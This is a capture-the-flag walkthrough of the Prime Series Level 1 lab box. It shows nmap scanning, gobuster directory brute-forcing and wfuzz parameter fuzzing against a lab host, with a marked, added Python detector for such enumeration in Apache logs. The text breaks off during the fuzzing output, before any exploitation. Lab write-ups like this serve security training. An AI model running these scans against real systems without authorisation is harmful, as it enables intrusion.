Prime Series Level 1

Host Discovery

└─$ sudo nmap -sn 10.10.10.0/24
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:15 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.132
Host is up (0.00016s latency).
MAC Address: 00:0C:29:8F:D3:1E (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:F4:2A:5D (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.99 seconds

Port Scanning

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.132 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:16 EDT
Nmap scan report for 10.10.10.132
Host is up (0.00074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:8F:D3:1E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.38 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.132 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:17 EDT
Nmap scan report for 10.10.10.132
Host is up (0.00040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: HacknPentest
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:8F:D3:1E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.03 seconds

UDP

└─$ sudo nmap -sC -sU -p22,80 10.10.10.132 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:18 EDT
Nmap scan report for 10.10.10.132
Host is up (0.00038s latency).

PORT   STATE  SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:8F:D3:1E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

Nmap Vulnerability Scan

└─$ sudo nmap --script=vuln -p22,80 10.10.10.132 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 03:18 EDT

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: WordPress login page.
MAC Address: 00:0C:29:8F:D3:1E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 384.58 seconds

Penetration Approach

Web Penetration

Directory Brute-Forcing

└─$ sudo gobuster dir -u http://10.10.10.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[sudo] password for kali:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 03:22:59 Starting gobuster in directory enumeration mode
===============================================================
/dev                  (Status: 200) [Size: 131]
/javascript           (Status: 301) [Size: 317] [--> http://10.10.10.132/javascript/]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.10.132/wordpress/]
/server-status        (Status: 403) [Size: 300]
Progress: 22381 / 62285 (35.93%)[ERROR] 2023/07/24 03:23:07 [!] parse "http://10.10.10.132/error\x1f_log": net/url: invalid control character in URL
Progress: 61924 / 62285 (99.42%)
===============================================================
2023/07/24 03:23:19 Finished
===============================================================
└─$ curl http://10.10.10.132/dev
hello,

now you are at level 0 stage.

In real life pentesting we should use our tools to dig on a web very hard.

Happy hacking.

└─$ curl http://10.10.10.132/server-status
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status
on this server.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.10.132 Port 80</address>
</body></html>

Directory Brute-Forcing with Specified Extensions

└─$ gobuster dir -u http://10.10.10.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .zip,.txt,.rar,.gz
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              zip,txt,rar,gz
[+] Timeout:                 10s
===============================================================
2023/07/24 03:30:52 Starting gobuster in directory enumeration mode
===============================================================
/dev                  (Status: 200) [Size: 131]
/javascript           (Status: 301) [Size: 317] [--> http://10.10.10.132/javascript/]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.10.132/wordpress/]
/secret.txt           (Status: 200) [Size: 412]
/server-status        (Status: 403) [Size: 300]
===============================================================
2023/07/24 03:31:40 Finished
===============================================================

An extra file, secret.txt, shows up. Open it to see what it contains.

└─$ curl http://10.10.10.132/secret.txt
Looks like you have got some secrets.

Ok I just want to do some help to you.

Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

//see the location.txt and you will get your next move//

Following the hint, run the directory brute-force again with the extension set to php.

└─$ gobuster dir -u http://10.10.10.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/07/24 03:37:06 Starting gobuster in directory enumeration mode
===============================================================
/dev                  (Status: 200) [Size: 131]
/javascript           (Status: 301) [Size: 317] [--> http://10.10.10.132/javascript/]
/index.php            (Status: 200) [Size: 136]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.10.132/wordpress/]
/image.php            (Status: 200) [Size: 147]
/server-status        (Status: 403) [Size: 300]
/.php                 (Status: 403) [Size: 291]
===============================================================
2023/07/24 03:37:25 Finished
===============================================================
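
Added example (not part of the original write-up): on the server side, the gobuster runs above appear in the Apache access log as a burst of requests from one client for distinct paths, almost all answered 404. The sketch below flags that pattern and lists what the client actually found. The log lines, client addresses and thresholds are constructed assumptions; only the `gobuster/3.5` User-Agent and the discovered paths come from the output above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
KNOWN_SCANNER_UA = re.compile(r"gobuster", re.I)  # UA string shown in the gobuster banner


def parse(lines):
    """Yield one event dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield {
                "host": m["host"],
                "ts": datetime.strptime(m["ts"], TS_FMT),
                "path": m["target"].split("?", 1)[0],
                "status": int(m["status"]),
                "ua": m["ua"],
            }


def detect_enumeration(lines, window=timedelta(seconds=10),
                       min_requests=30, min_404_ratio=0.9):
    """Flag clients with a burst of mostly-404 requests for distinct paths.

    Thresholds are illustrative assumptions, to be tuned against real traffic.
    """
    by_host = defaultdict(list)
    for ev in parse(lines):
        by_host[ev["host"]].append(ev)

    findings = {}
    for host, events in by_host.items():
        events.sort(key=lambda e: e["ts"])
        start = 0
        for end, ev in enumerate(events):
            # Shrink the window from the left until it spans at most `window`.
            while ev["ts"] - events[start]["ts"] > window:
                start += 1
            burst = events[start:end + 1]
            if len(burst) < min_requests:
                continue
            misses = sum(e["status"] == 404 for e in burst)
            distinct = len({e["path"] for e in burst})
            if misses / len(burst) >= min_404_ratio and distinct >= min_requests:
                findings[host] = {
                    "burst_requests": len(burst),
                    # What the client actually found: everything not answered 404.
                    "exposed": sorted({e["path"] for e in events if e["status"] != 404}),
                    # Weak signal only: the User-Agent is client-controlled.
                    "scanner_ua": any(KNOWN_SCANNER_UA.search(e["ua"]) for e in events),
                }
                break
    return findings


def build_sample_log(scanner_ua="gobuster/3.5"):
    """Constructed sample log: one enumerating client, one ordinary visitor."""
    base = datetime(2023, 7, 24, 3, 30, 52, tzinfo=timezone(timedelta(hours=-4)))
    found = {"dev": 200, "secret.txt": 200, "server-status": 403}
    words = [f"guess{i}" for i in range(60)] + list(found)
    lines = []
    for i, word in enumerate(words):
        ts = (base + timedelta(milliseconds=50 * i)).strftime(TS_FMT)
        lines.append(f'10.10.10.128 - - [{ts}] "GET /{word} HTTP/1.1" '
                     f'{found.get(word, 404)} 300 "-" "{scanner_ua}"')
    for i, path in enumerate(["/", "/wordpress/", "/favicon.ico"]):
        ts = (base + timedelta(seconds=20 * i)).strftime(TS_FMT)
        status = 404 if path == "/favicon.ico" else 200
        lines.append(f'10.10.10.1 - - [{ts}] "GET {path} HTTP/1.1" '
                     f'{status} 512 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for host, info in detect_enumeration(build_sample_log()).items():
        print(host, info)
```

The `exposed` list is the part to act on: it shows which resources, such as `/secret.txt`, answered the enumeration and should be removed or access-controlled.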

Several more files show up. Following the hints on the referenced GitHub fuzzing page, test the PHP pages.

Fuzzing

└─$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://10.10.10.132/index.php?FUZZ=something
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.132/index.php?FUZZ=something
Total requests: 951
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000001:   200        7 L      12 W       136 Ch      "@"
000000047:   200        7 L      12 W       136 Ch      "adminsql"
000000046:   200        7 L      12 W       136 Ch      "admin_logon"
000000015:   200        7 L      12 W       136 Ch      "2001"
000000003:   200        7 L      12 W       136 Ch      "01"
000000048:   200        7 L      12 W       136 Ch      "admon"
000000031:   200        7 L      12 W       136 Ch      "action"
000000045:   200        7 L      12 W       136 Ch      "adminlogon"
000000007:   200        7 L      12 W       136 Ch      "10"
000000044:   200        7 L      12 W       136 Ch      "admin_login"
000000043:   200        7 L      12 W       136 Ch      "adminlogin"
000000037:   200        7 L      12 W       136 Ch      "admin_"
000000036:   200        7 L      12 W       136 Ch      "_admin"
000000040:   200        7 L      12 W       136 Ch      "administration"
000000042:   200        7 L      12 W       136 Ch      "administrator"
000000038:   200        7 L      12 W       136 Ch      "Admin"
000000039:   200        7 L      12 W       136 Ch      "administrat"
000000035:   200        7 L      12 W       136 Ch      "admin"
000000041:   200        7 L      12 W       136 Ch      "Administration"
000000034:   200        7 L      12 W       136 Ch      "adm"
000000033:   200        7 L      12 W       136 Ch      "active"
000000026:   200        7 L      12 W       136 Ch      "academic"
000000025:   200        7 L      12 W       136 Ch      "about"
000000029:   200        7 L      12 W       136 Ch      "account"
000000030:   200        7 L      12 W       136 Ch      "accounting"
000000027:   200        7 L      12 W       136 Ch      "access"
000000028:   200        7 L      12 W       136 Ch      "accessgranted"
000000024:   200        7 L      12 W       136 Ch      "abc"
000000032:   200        7 L      12 W       136 Ch      "actions"
000000023:   200        7 L      12 W       136 Ch      "aaa"
000000022:   200        7 L      12 W       136 Ch      "aa"
000000014:   200        7 L      12 W       136 Ch      "2000"
000000016:   200        7 L      12 W       136 Ch      "2002"
000000019:   200        7 L      12 W       136 Ch      "2005"
000000021:   200        7 L      12 W       136 Ch      "a"
000000017:   200        7 L      12 W       136 Ch      "2003"
000000018:   200        7 L      12 W       136 Ch      "2004"
000000013:   200        7 L      12 W       136 Ch      "200"
000000020:   200        7 L      12 W       136 Ch      "3"
000000012:   200        7 L      12 W       136 Ch      "20"
000000011:   200        7 L      12 W       136 Ch      "2"
000000002:   200        7 L      12 W       136 Ch      "00"
000000004:   200        7 L      12 W       136 Ch      "02"
000000005:   200        7 L      12 W       136 Ch      "03"
000000006:   200        7 L      12 W       136 Ch      "1"
000000010:   200        7 L      12 W       136 Ch      "123"
000000008:   200        7 L      12 W       136 Ch      "100"
000000009:   200        7 L      12 W       136 Ch      "1000"
000000051:   200        7 L      12 W       136 Ch      "agents"
000000049:   200        7 L      12 W       136 Ch      "adsl"
000000055:   200        7 L      12 W       136 Ch      "alpha"
000000071:   200        7 L      12 W       136 Ch      "archive"
000000063:   200        7 L      12 W       136 Ch      "app"
000000069:   200        7 L      12 W       136 Ch      "apply"
000000073:   200        7 L      12 W       136 Ch      "arrow"
000000066:   200        7 L      12 W       136 Ch      "appliance"
000000068:   200        7 L      12 W       136 Ch      "applications"
000000072:   200        7 L      12 W       136 Ch      "archives"
000000070:   200        7 L      12 W       136 Ch      "apps"
000000067:   200        7 L      12 W       136 Ch      "application"
000000065:   200        7 L      12 W       136 Ch      "applets"
000000062:   200        7 L      12 W       136 Ch      "api"
000000064:   200        7 L      12 W       136 Ch      "applet"
000000061:   200        7 L      12 W       136 Ch      "apache"
000000060:   200        7 L      12 W       136 Ch      "any"
000000056:   200        7 L      12 W       136 Ch      "analog"
000000057:   200        7 L      12 W       136 Ch      "analyse"
000000059:   200        7 L      12 W       136 Ch      "answer"
000000058:   200        7 L      12 W       136 Ch      "announcements"
000000054:   200        7 L      12 W       136 Ch      "all"
000000053:   200        7 L      12 W       136 Ch      "aliases"
000000050:   200        7 L      12 W       136 Ch      "agent"
000000052:   200        7 L      12 W       136 Ch      "alias"
000000074:   200        7 L      12 W       136 Ch      "asp"
000000076:   200        7 L      12 W       136 Ch      "assets"
000000094:   200        7 L      12 W       136 Ch      "bank"
000000096:   200        7 L      12 W       136 Ch      "banner"
000000080:   200        7 L      12 W       136 Ch      "auth"
000000088:   200        7 L      12 W       136 Ch      "backup"
000000095:   200        7 L      12 W       136 Ch      "banks"
000000091:   200        7 L      12 W       136 Ch      "bak"
000000090:   200        7 L      12 W       136 Ch      "backups"
000000093:   200        7 L      12 W       136 Ch      "bak-up"
000000092:   200        7 L      12 W       136 Ch      "bakup"
000000087:   200        7 L      12 W       136 Ch      "backoffice"
000000083:   200        7 L      12 W       136 Ch      "b"
000000085:   200        7 L      12 W       136 Ch      "backdoor"
000000089:   200        7 L      12 W       136 Ch      "back-up"
000000086:   200        7 L      12 W       136 Ch      "backend"
000000084:   200        7 L      12 W       136 Ch      "back"
000000082:   200        7 L      12 W       136 Ch      "automatic"
000000079:   200        7 L      12 W       136 Ch      "audit"
000000081:   200        7 L      12 W       136 Ch      "auto"
000000075:   200        7 L      12 W       136 Ch      "aspadmin"
000000111:   200        7 L      12 W       136 Ch      "binaries"
000000099:   200        7 L      12 W       136 Ch      "basic"
000000077:   200        7 L      12 W       136 Ch      "attach"
000000097:   200        7 L      12 W       136 Ch      "banners"
000000103:   200        7 L      12 W       136 Ch      "bdata"
000000078:   200        7 L      12 W       136 Ch      "attachments"
000000122:   200        7 L      12 W       136 Ch      "boxes"
000000121:   200        7 L      12 W       136 Ch      "box"
000000120:   200        7 L      12 W       136 Ch      "bots"
000000115:   200        7 L      12 W       136 Ch      "board"
000000117:   200        7 L      12 W       136 Ch      "body"
000000119:   200        7 L      12 W       136 Ch      "bot"
000000118:   200        7 L      12 W       136 Ch      "boot"
000000116:   200        7 L      12 W       136 Ch      "boards"
000000114:   200        7 L      12 W       136 Ch      "blow"
000000113:   200        7 L      12 W       136 Ch      "blog"
000000110:   200        7 L      12 W       136 Ch      "bin"
000000112:   200        7 L      12 W       136 Ch      "biz"
000000109:   200        7 L      12 W       136 Ch      "billing"
000000102:   200        7 L      12 W       136 Ch      "bd"
000000106:   200        7 L      12 W       136 Ch      "beans"
000000108:   200        7 L      12 W       136 Ch      "bill"
000000107:   200        7 L      12 W       136 Ch      "beta"
000000105:   200        7 L      12 W       136 Ch      "bean"
000000104:   200        7 L      12 W       136 Ch      "bea"
000000101:   200        7 L      12 W       136 Ch      "batch"
000000100:   200        7 L      12 W       136 Ch      "bass"
000000146:   200        7 L      12 W       136 Ch      "catalog"
000000137:   200        7 L      12 W       136 Ch      "captcha"
000000145:   200        7 L      12 W       136 Ch      "cat"
000000125:   200        7 L      12 W       136 Ch      "bug"
000000129:   200        7 L      12 W       136 Ch      "bulk"
000000098:   200        7 L      12 W       136 Ch      "base"
000000123:   200        7 L      12 W       136 Ch      "broken"
000000144:   200        7 L      12 W       136 Ch      "cas"
000000143:   200        7 L      12 W       136 Ch      "cart"
000000142:   200        7 L      12 W       136 Ch      "carpet"
000000141:   200        7 L      12 W       136 Ch      "cards"
000000136:   200        7 L      12 W       136 Ch      "can"
000000139:   200        7 L      12 W       136 Ch      "card"
000000134:   200        7 L      12 W       136 Ch      "cachemgr"
000000131:   200        7 L      12 W       136 Ch      "buttons"
000000132:   200        7 L      12 W       136 Ch      "c"
000000128:   200        7 L      12 W       136 Ch      "builder"
000000135:   200        7 L      12 W       136 Ch      "cad"
000000133:   200        7 L      12 W       136 Ch      "cache"
000000140:   200        7 L      12 W       136 Ch      "cardinal"
000000138:   200        7 L      12 W       136 Ch      "car"
000000130:   200        7 L      12 W       136 Ch      "business"
000000127:   200        7 L      12 W       136 Ch      "build"
000000126:   200        7 L      12 W       136 Ch      "bugs"
000000161:   200        7 L      12 W       136 Ch      "cgibin"
000000153:   200        7 L      12 W       136 Ch      "cert"
000000149:   200        7 L      12 W       136 Ch      "cc"
000000147:   200        7 L      12 W       136 Ch      "catalogs"
000000124:   200        7 L      12 W       136 Ch      "bsd"
000000168:   200        7 L      12 W       136 Ch      "chart"
000000169:   200        7 L      12 W       136 Ch      "chat"
000000170:   200        7 L      12 W       136 Ch      "class"
000000171:   200        7 L      12 W       136 Ch      "classes"
000000167:   200        7 L      12 W       136 Ch      "channel"
000000163:   200        7 L      12 W       136 Ch      "cgi-win"
000000164:   200        7 L      12 W       136 Ch      "chan"
000000165:   200        7 L      12 W       136 Ch      "change"
000000166:   200        7 L      12 W       136 Ch      "changepw"
000000160:   200        7 L      12 W       136 Ch      "cgi"
000000157:   200        7 L      12 W       136 Ch      "certs"
000000158:   200        7 L      12 W       136 Ch      "cfdocs"
000000159:   200        7 L      12 W       136 Ch      "cfg"
000000162:   200        7 L      12 W       136 Ch      "cgi-bin"
000000156:   200        7 L      12 W       136 Ch      "certificates"
000000151:   200        7 L      12 W       136 Ch      "cd"
000000154:   200        7 L      12 W       136 Ch      "certenroll"
000000152:   200        7 L      12 W       136 Ch      "cdrom"
000000155:   200        7 L      12 W       136 Ch      "certificate"
000000148:   200        7 L      12 W       136 Ch      "catch"
000000178:   200        7 L      12 W       136 Ch      "cm"
000000174:   200        7 L      12 W       136 Ch      "classifieds"
000000172:   200        7 L      12 W       136 Ch      "classic"
000000150:   200        7 L      12 W       136 Ch      "ccs"
000000186:   200        7 L      12 W       136 Ch      "common"
000000195:   200        7 L      12 W       136 Ch      "configs"
000000193:   200        7 L      12 W       136 Ch      "confluence"
000000196:   200        7 L      12 W       136 Ch      "configuration"
000000194:   200        7 L      12 W       136 Ch      "config"
000000192:   200        7 L      12 W       136 Ch      "con"
000000188:   200        7 L      12 W       136 Ch      "compose"
000000189:   200        7 L      12 W       136 Ch      "composer"
000000190:   200        7 L      12 W       136 Ch      "compressed"
000000191:   200        7 L      12 W       136 Ch      "comunicator"
000000185:   200        7 L      12 W       136 Ch      "commercial"
000000182:   200        7 L      12 W       136 Ch      "coke"
000000183:   200        7 L      12 W       136 Ch      "command"
000000184:   200        7 L      12 W       136 Ch      "commerce"
000000187:   200        7 L      12 W       136 Ch      "component"
000000181:   200        7 L      12 W       136 Ch      "coffee"
000000176:   200        7 L      12 W       136 Ch      "clients"
000000179:   200        7 L      12 W       136 Ch      "cmd"
000000177:   200        7 L      12 W       136 Ch      "cluster"
000000180:   200        7 L      12 W       136 Ch      "code"
000000173:   200        7 L      12 W       136 Ch      "classified"
000000219:   200        7 L      12 W       136 Ch      "credit"
000000203:   200        7 L      12 W       136 Ch      "contact"
000000199:   200        7 L      12 W       136 Ch      "connections"
000000218:   200        7 L      12 W       136 Ch      "creation"
000000175:   200        7 L      12 W       136 Ch      "client"
000000211:   200        7 L      12 W       136 Ch      "corba"
000000197:   200        7 L      12 W       136 Ch      "configure"
000000217:   200        7 L      12 W       136 Ch      "create"
000000220:   200        7 L      12 W       136 Ch      "creditcards"
000000216:   200        7 L      12 W       136 Ch      "cpanel"
000000215:   200        7 L      12 W       136 Ch      "counter"
000000214:   200        7 L      12 W       136 Ch      "count"
000000213:   200        7 L      12 W       136 Ch      "corporate"
000000210:   200        7 L      12 W       136 Ch      "controls"
000000212:   200        7 L      12 W       136 Ch      "core"
000000209:   200        7 L      12 W       136 Ch      "controlpanel"
000000207:   200        7 L      12 W       136 Ch      "control"
000000208:   200        7 L      12 W       136 Ch      "controller"
000000206:   200        7 L      12 W       136 Ch      "contents"
000000205:   200        7 L      12 W       136 Ch      "content"
000000202:   200        7 L      12 W       136 Ch      "constants"
000000204:   200        7 L      12 W       136 Ch      "contacts"
000000201:   200        7 L      12 W       136 Ch      "constant"
000000227:   200        7 L      12 W       136 Ch      "customize"
000000221:   200        7 L      12 W       136 Ch      "crm"
000000198:   200        7 L      12 W       136 Ch      "connect"
000000200:   200        7 L      12 W       136 Ch      "console"
000000223:   200        7 L      12 W       136 Ch      "crs"
000000235:   200        7 L      12 W       136 Ch      "daemon"
000000239:   200        7 L      12 W       136 Ch      "databases"
000000244:   200        7 L      12 W       136 Ch      "dbm"
000000245:   200        7 L      12 W       136 Ch      "dbms"
000000246:   200        7 L      12 W       136 Ch      "debug"
000000243:   200        7 L      12 W       136 Ch      "dbase"
000000238:   200        7 L      12 W       136 Ch      "database"
000000240:   200        7 L      12 W       136 Ch      "dav"
000000241:   200        7 L      12 W       136 Ch      "db"
000000242:   200        7 L      12 W       136 Ch      "dba"
000000237:   200        7 L      12 W       136 Ch      "data"
000000232:   200        7 L      12 W       136 Ch      "CYBERDOCS25"
000000233:   200        7 L      12 W       136 Ch      "CYBERDOCS31"
000000236:   200        7 L      12 W       136 Ch      "dat"
000000234:   200        7 L      12 W       136 Ch      "d"
000000231:   200        7 L      12 W       136 Ch      "CYBERDOCS"
000000228:   200        7 L      12 W       136 Ch      "cv"
000000226:   200        7 L      12 W       136 Ch      "customers"
000000229:   200        7 L      12 W       136 Ch      "cvs"
000000230:   200        7 L      12 W       136 Ch      "CVS"
000000224:   200        7 L      12 W       136 Ch      "css"
000000247:   200        7 L      12 W       136 Ch      "default"
000000225:   200        7 L      12 W       136 Ch      "customer"
000000222:   200        7 L      12 W       136 Ch      "cron"
000000249:   200        7 L      12 W       136 Ch      "deletion"
000000271:   200        7 L      12 W       136 Ch      "directory"
000000273:   200        7 L      12 W       136 Ch      "disk"
000000253:   200        7 L      12 W       136 Ch      "deploy"
000000272:   200        7 L      12 W       136 Ch      "discovery"
000000269:   200        7 L      12 W       136 Ch      "dig"
000000267:   200        7 L      12 W       136 Ch      "diag"
000000268:   200        7 L      12 W       136 Ch      "dial"
000000261:   200        7 L      12 W       136 Ch      "developement"
000000270:   200        7 L      12 W       136 Ch      "dir"
000000266:   200        7 L      12 W       136 Ch      "devs"
000000262:   200        7 L      12 W       136 Ch      "developers"
000000263:   200        7 L      12 W       136 Ch      "development"
000000265:   200        7 L      12 W       136 Ch      "devices"
000000264:   200        7 L      12 W       136 Ch      "device"
000000260:   200        7 L      12 W       136 Ch      "develop"
000000259:   200        7 L      12 W       136 Ch      "devel"
000000258:   200        7 L      12 W       136 Ch      "dev60cgi"
000000257:   200        7 L      12 W       136 Ch      "dev"
000000256:   200        7 L      12 W       136 Ch      "details"
000000248:   200        7 L      12 W       136 Ch      "delete"
000000255:   200        7 L      12 W       136 Ch      "design"
000000254:   200        7 L      12 W       136 Ch      "deployment"
000000251:   200        7 L      12 W       136 Ch      "demos"
000000252:   200        7 L      12 W       136 Ch      "deny"
000000250:   200        7 L      12 W       136 Ch      "demo"
000000274:   200        7 L      12 W       136 Ch      "dispatch"
000000276:   200        7 L      12 W       136 Ch      "dms"
000000280:   200        7 L      12 W       136 Ch      "docs41"
000000292:   200        7 L      12 W       136 Ch      "dumpenv"
000000289:   200        7 L      12 W       136 Ch      "dratfs"
000000287:   200        7 L      12 W       136 Ch      "draft"
000000290:   200        7 L      12 W       136 Ch      "driver"
000000291:   200        7 L      12 W       136 Ch      "dump"
000000288:   200        7 L      12 W       136 Ch      "dragon"
000000293:   200        7 L      12 W       136 Ch      "e"
000000286:   200        7 L      12 W       136 Ch      "downloads"
000000285:   200        7 L      12 W       136 Ch      "download"
000000284:   200        7 L      12 W       136 Ch      "down"
000000278:   200        7 L      12 W       136 Ch      "doc"
000000279:   200        7 L      12 W       136 Ch      "docs"
000000283:   200        7 L      12 W       136 Ch      "documents"
000000282:   200        7 L      12 W       136 Ch      "document"
000000281:   200        7 L      12 W       136 Ch      "docs51"
000000275:   200        7 L      12 W       136 Ch      "dispatcher"
000000277:   200        7 L      12 W       136 Ch      "dns"
000000294:   200        7 L      12 W       136 Ch      "easy"
000000296:   200        7 L      12 W       136 Ch      "echannel"
000000300:   200        7 L      12 W       136 Ch      "element"
000000317:   200        7 L      12 W       136 Ch      "esp"
000000319:   200        7 L      12 W       136 Ch      "esupport"
000000308:   200        7 L      12 W       136 Ch      "english"
000000320:   200        7 L      12 W       136 Ch      "etc"
000000318:   200        7 L      12 W       136 Ch      "established"
000000316:   200        7 L      12 W       136 Ch      "esales"
000000315:   200        7 L      12 W       136 Ch      "es"
000000314:   200        7 L      12 W       136 Ch      "errors"
000000313:   200        7 L      12 W       136 Ch      "error"
000000309:   200        7 L      12 W       136 Ch      "enterprise"
000000312:   200        7 L      12 W       136 Ch      "environment"
000000310:   200        7 L      12 W       136 Ch      "env"
000000307:   200        7 L      12 W       136 Ch      "engine"
000000304:   200        7 L      12 W       136 Ch      "employees"
000000305:   200        7 L      12 W       136 Ch      "en"
000000306:   200        7 L      12 W       136 Ch      "eng"
000000311:   200        7 L      12 W       136 Ch      "environ"
000000297:   200        7 L      12 W       136 Ch      "ecommerce"
000000295:   200        7 L      12 W       136 Ch      "ebriefs"
000000321:   200        7 L      12 W       136 Ch      "event"
000000303:   200        7 L      12 W       136 Ch      "employee"
000000323:   200        7 L      12 W       136 Ch      "example"
000000302:   200        7 L      12 W       136 Ch      "email"
000000301:   200        7 L      12 W       136 Ch      "elements"
000000298:   200        7 L      12 W       136 Ch      "edit"
000000348:   200        7 L      12 W       136 Ch      "foo"
000000335:   200        7 L      12 W       136 Ch      "Extranet"
000000299:   200        7 L      12 W       136 Ch      "editor"
000000327:   200        7 L      12 W       136 Ch      "exec"
000000347:   200        7 L      12 W       136 Ch      "folder"
000000341:   200        7 L      19 W       206 Ch      "file"
000000874:   200        7 L      12 W       136 Ch      "validation"
000000880:   200        7 L      12 W       136 Ch      "vbscript"
000000888:   200        7 L      12 W       136 Ch      "vpn"
000000897:   200        7 L      12 W       136 Ch      "wdav"
000000896:   200        7 L      12 W       136 Ch      "warez"
000000891:   200        7 L      12 W       136 Ch      "w3c"
000000893:   200        7 L      12 W       136 Ch      "W3SVC1"
000000895:   200        7 L      12 W       136 Ch      "W3SVC3"
000000892:   200        7 L      12 W       136 Ch      "W3SVC"
000000887:   200        7 L      12 W       136 Ch      "visitor"
000000886:   200        7 L      12 W       136 Ch      "virtual"
000000889:   200        7 L      12 W       136 Ch      "w"
000000894:   200        7 L      12 W       136 Ch      "W3SVC2"
000000890:   200        7 L      12 W       136 Ch      "w3"
000000879:   200        7 L      12 W       136 Ch      "vbs"
000000881:   200        7 L      12 W       136 Ch      "vbscripts"
000000883:   200        7 L      12 W       136 Ch      "view"
000000882:   200        7 L      12 W       136 Ch      "vfs"
000000885:   200        7 L      12 W       136 Ch      "views"
000000898:   200        7 L      12 W       136 Ch      "web"
